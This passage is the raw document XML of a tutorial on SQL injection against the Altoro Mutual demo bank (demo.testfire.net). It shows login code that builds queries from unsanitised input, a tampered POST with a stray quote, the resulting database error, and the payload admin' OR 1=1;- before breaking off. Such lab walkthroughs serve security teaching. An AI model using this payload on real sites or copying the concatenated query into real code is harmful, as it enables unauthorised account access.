              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11954"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protected string ValidateUser(String uName, String pWord)</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//Set default status to Success</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      string status = "Success";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      OleDbConnection myConnection = new OleDbConnection();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      myConnection.ConnectionString = ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      myConnection.Open();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      string query2 = "SELECT * From users WHERE username = '" + uName + "'";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      string query1 = query2 + " AND password = '" + pWord + "'";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      if (ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString.Contains("Microsoft.Jet.OLEDB.4.0"))</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 Hack for MS Access which can not terminate a string</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          query1 = Regex.Replace(query1, "--.*", "");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          query2 = Regex.Replace(query2, "--.*",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As you can see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>uName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter doesn’t get sanitized, so you can easily run some </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let’s try that out. Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://www.portswigger.net/burp/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> we’ll tamper data sent to the web server and analyze the responses.</w:t>
      </w:r>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Here’s the request:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="226049"/>
        <w:tblW w:w="9165" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="8730"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3781"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434"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 xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873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POST /bank/login.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.6) Gecko/20100101 Firefox/10.0.6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Language: en-us,en;q=0.5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Proxy-Connection: keep-alive</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Referer: http://demo.testfire.net/bank/login.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Cookie: ASP.NET_SessionId=2ks1fprgokgkd0jthbms3d25; amSessionId=62733112717</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Content-Length: 39</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>uid=admin%27&amp;passw=test&amp;btnSubmit=Login</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As a response you’ll get:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="586755"/>
        <w:tblW w:w="190379" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="190049"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1929"/>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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19004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An Error Has Occurred</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Summary:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Syntax error (missing operator) in query expression 'username = 'admin'' AND password = 'test''.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Error Message:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'username = 'admin'' AND password = 'test''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr) at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&amp; executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object&amp; executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object&amp; executeResult) at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable) at Altoro.Authentication.ValidateUser(String uName, String pWord) in d:downloadsAltoroMutual_v6websitanklogin.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender, EventArgs e) in d:downloadsAltoroMutual_v6websitanklogin.aspx.cs:line 33 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)</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i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Single quotes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> are obvisouly not escaped so we could inject some SQL statements. Let’s try some common ones likeÂ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>admin' OR 1=1;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="177126"/>
        <w:tblW w:w="9165" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="8730"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3781"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434"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 xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
